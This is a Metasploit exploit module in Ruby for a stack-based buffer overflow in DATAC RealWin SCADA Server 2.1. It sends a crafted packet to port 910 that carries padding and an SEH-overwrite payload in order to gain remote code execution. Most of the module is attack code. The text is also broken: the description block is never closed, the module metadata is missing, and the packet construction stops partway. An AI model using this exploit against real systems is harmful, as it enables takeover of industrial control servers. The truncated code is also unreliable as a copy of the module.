##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking
include Msf::Exploit::Remote::Tcp
include Msf::Exploit::Remote::Seh
def initialize(info = {})
super(update_info(info,
'Name' => 'DATAC RealWin SCADA Server 2 On_FC_CONNECT_FCS_a_FILE Buffer Overflow',
'Description' => %q{
This module exploits a vulnerability found in DATAC Control International RealWin
SCADA Server 2.1 and below. By supplying a specially crafted On_FC_BINFILE_FCS_*FILE
packet via port 910, RealWin will try to create a file (which would be saved to
C:\Program Files\DATAC\Real Win\RW-version\filename) by first copying the user-
supplied filename with a inline memcpy routine without proper bounds checking, which
results a stack-based buffer overflow, allowing arbitrary remote code execution.
register_options([Opt::RPORT(910)], self.class)
end
def exploit
connect
data = [0x67542310].pack('V')
data << [0x00000824].pack('V')
data << [0x00100001].pack('V')
data << [0x00000001].pack('V') #Packet type
data << [0x00060000].pack('V')
data << [0x0000ffff].pack('V')
data << rand_text_alpha_upper(221)
data << generate_seh_payload(target.ret)
data << rand_text_alpha_upper(17706 - payload.encoded.length)
data << [0x451c3500].pack('V')
data << [0x00000154].pack('V')
data << [0x00020040].pack('V')